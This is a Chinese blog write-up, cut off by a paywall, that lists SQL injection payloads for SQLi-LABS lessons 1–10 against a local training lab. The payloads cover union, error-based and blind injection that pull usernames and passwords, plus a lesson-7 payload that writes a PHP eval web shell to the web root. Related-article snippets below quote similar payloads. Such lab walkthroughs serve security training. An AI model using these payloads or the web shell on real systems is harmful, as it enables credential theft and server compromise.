SQLi-LABS-Page-1(Basic-Challenges)-less1-22注入教程

最新推荐文章于 2024-05-18 14:05:46 发布
最新推荐文章于 2024-05-18 14:05:46 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: Writer-up
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhhy7788/article/details/79595719
版权

less 1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)
http://localhost/sqli-labs/Less-1/?id=-1' or 1=1 union select 1,2,concat_ws(char(32,58,32),id,database(),password) from users limit 1,1 --+

less 2 GET - Error based - Intiger based (基于错误的GET整型注入)
http://localhost/sqli-labs/Less-2/?id=-1 union select 1,2,concat_ws(char(32,58,32),id,database(),password) from users limit 0,1 %23

less 3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)
http://localhost/sqli-labs/Less-3/?id=-1%27) union select 1,2,concat_ws(char(32,58,32),id,username,password) from users limit 6,1 --+

less 4 GET - Error based - Double Quotes - String (基于错误的GET双引号字符型注入)

http://localhost/sqli-labs/Less-4/?id=1") union select 1,2,concat_ws(char(32,58,32),id,username,password) from users limit 1,1 --+

less 5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入)
http://localhost/sqli-labs/Less-5/?id=1' union select count(*),1, concat((select database()), floor(rand()*2)) as a from information_schema.tables group by a%23

less 6 GET - Double Injection - Double Quotes - String (双注入GET双引号字符型注入)
http://localhost/sqli-labs/Less-6/?id=1" union select count(*),1, concat('~',(select user()),'~', floor(rand()*2)) as a from information_schema.tables group by a%23

less 7 GET - Dump into outfile - String (导出文件GET字符型注入)
http://localhost/sqli-labs/Less-7/?id=1')) union select 1,'2','<?php @eval($_POST["giantbranch"]);?>' into outfile 'E:\\wamp\\www\\sqli-labs\\muma.php' %23

less 8 GET - Blind - Boolian Based - Single Quotes (布尔型单引号GET盲注)
sqlmap 跑跑跑
http://localhost/sqli-labs/Less-8/?id=1' and ascii(substr((select database()),1,1)>64 %23 返回正确,大于64
http://localhost/sqli-labs/Less-8/?id=1' and ascii(substr((select database()),1,1))>96 %23 返回正确,大于96
http://localhost/sqli-labs/Less-8/?id=1' and ascii(substr((select database()),1,1))<123 %23 返回正确,小于123 ,区间在97-122
less 9 GET - Blind - Time based. - Single Quotes (基于时间的GET单引号盲注)
sqlmap 跑跑跑
http://localhost/sqli-labs/Less-9/?id=1' and if(ascii(substr(database(),1,1))>115, 0, sleep(5)) %23

less 10 GET - Blind - Time based - double quotes (基于时间的双引号盲注)
把上面的改成双引号就行判断为基于时间的双引号注入
http://localhost/sqli-l

最低0.47元/天 解锁文章
zhhy7788
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQLi-LABS Page-1(Basic Challenges)1-22
05-18
### SQLi-LABS Page-1 (Basic Challenges)1-22 知识点解析 #### 第一关:Less-1 - 字符型注入 在这一关卡中,我们需要找到一个可注入点,并通过该点执行SQL注入攻击。具体步骤如下: 1. **访问靶场**: - 访问...
Sqli-labs解题一(Page-1-Basic Challenges)
Bird&Bird
01-05 1555
目录Less-1 单引号字符型注入Less-2 整型注入Less-3 Less-1 单引号字符型注入 输入单引号’,页面报错如下 根据报错知道是单引号字符型注入 判断有多少列(ORDER BY 语句用于根据指定的列对结果集进行排序) ?id=1' order by 3 --+ 爆库名 ?id=-1' union select 1,database(),3 --+ 爆表名 ?id=-1' union select 1,group_concat(table_name) ,3 from informat
Sqli-labs--学习笔记
小人物的博客
05-15 289
数据库的连接函数:concat和concat_ws; concat_ws的第一个参数是连接字符串的分隔符。 user():返回当前数据库连接使用的用户 database():返回当前数据库连接使用的数据库 version():返回当前数据库的版本 127.0.0.1/sqli-labs/Less-1/?id=-1’ union select 1,2,concat_ws(char(32,5...
SQLi-LABS Page-1(Basic Challenges)1-22
最新发布
2301_77887106的博客
05-18 1491
3.使用1' and if(ascii(substr((select column_name from information_schema.columns where table_schema="指定数据库名字" and table_name="指定数据库表" limit 0,1),1,1))=55,sleep(2),0)--+来对数据库的首个字母所属的ascii值正逐个爆破,直到触发睡眠为止。id=1'+and+left(database(),2)='s§a§'--+,继续爆破,可以看到第二位为e。
sqli-lab教程——Less-7 GET - Dump into outfile - String (导出文件GET字符型注入
luosaierdadi的博客
07-08 320
几次尝试,不难猜出注释符被过滤了,但是看看题目:less 7 GET - Dump into outfile - String (导出文件GET字符型注入)所以大概要使用文件导出。我投机取巧了,找了个简单题less-2直接注入拿到路径,方便导出。这里插个小扩展:winserver的iis默认路径c:\Inetpub\wwwrootlinux的nginx一般是/usr/local/nginx/html,/home/wwwroot/default,/usr/share/nginx,/var/www/htm等ap
小菜鸡的学习笔记——sql注入sqli-lab边学边练
m0_51581045的博客
03-03 3729
小菜鸡也有大梦想
sqlilbas靶场记录头部注入(四)
wanan的博客
10-08 202
sqlilbas靶场记录头部注入(四)
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
详细sqli-labs(1-65)通关讲解
m0_67401134的博客
07-30 1万+
如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。...
sqli-labs靶场详解(less11-less16)
m0_72125469的博客
11-25 678
SQL注入-sqli-labs靶场详解(less11-less17)
SQL注入】Less-7导出文件GET字符型注入
Mitchell_Donovan的博客
03-30 376
Less-7导出文件GET字符型注入 什么是导出文件? 1、在本实验开始的0x2 sql注入基础知识就有介绍LOAD_FILE的用法,大家可以翻回去看看!另外在构建环境之初,由于是Linux系统,对这个目录的权限控制的很严谨。 2、所以在我们的payload中只能在/home/wwwroot/default/mysql才能写入或者读取文件!因为mysql目录的权限我们设置chowm -R mysql:mysql 3、另外要保证正常的文件写入与读取要在mysql配置文件my.cnf最后一行新增secur
SQL注入之GET型常规注入
Jim的博客
08-14 4441
less1单引号字符串注入 源码:$sql="select * from users where id='$id' limit 0,1"; $result=mysql_query($sql); $row=mysql_fetch_array($result); 注入:?id=1' or '1'='1  或者?id=1' or 1=1--%20 构建sql语句:?id=1' union se
sqlilabs教程(1-10)
热门推荐
一个安全研究员
04-18 3万+
前言 最近在研究sql注入,只是看书有点无聊(不推荐大家去看《sql注入攻击与防御》,这本书的翻译很奇怪,而且内容不太适合小白,可以当小说看) less-1 根据提示,可以知道只是个单引号注入的题目,我们在参数后面加一个单引号看下效果: 可以看到数据库报错了,最重要的就是能够看懂数据库的错误信息,从错误信息中我们可以知道是单引号的匹配出了问题,也就是说我们添加的单引号成功被...
sqli-labs
这个博客,写给十年后的自己......
05-30 1623
安装 参考自github介绍 cd /opt/lampp/htdocs git clone https://git.oschina.net/jiaruipeng/sqli-labs.git 这是放到了自己的git上 cd sqli-labs/sql-connections && vim db-creds.inc 更改mysql用户名和密码,xampp默认的就是root,密码
MySQL使用SELECT...INTO OUTFILE导出文本文件
黑坑的专栏
01-18 5375
MySQL中,可以使用SELECT...INTO OUTFILE语句将表的内容导出为一个文本文件。其基本的语法格式如下: SELECT [列名] FROM table [WHERE 语句] INTO OUTFILE '目标文件' [OPTION]; 该语句分为两个部分。前半部分是一个普通的SELECT语句,通过这个SELECT语句来查询所需要的数据;后半部分
sqli-less11题解详细过程
weixin_44352058的博客
04-22 1228
sqli-less11题解 首先我们打开less11看一下 这个题目具有交互界面,有username和password,所以这里我们用不到bp进行拦截。那我们就开始找注入点。 1.在username和password 中都输入 admin 查看结果,可以正常登陆 1: username: admin password: admin 2.那就在username中输入 admin’测试 ...
MySQL注入实战指南——Sqli-labs教程解析
"MySQL注入天书——Sqli-labs使用手册" 这篇文档是关于MySQL注入技术的详细指南,特别关注于使用Sqli-labs进行实战练习。作者Lcamry在2016年编写了这份手册,旨在帮助读者理解和掌握SQL注入攻击与防御的相关知识。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值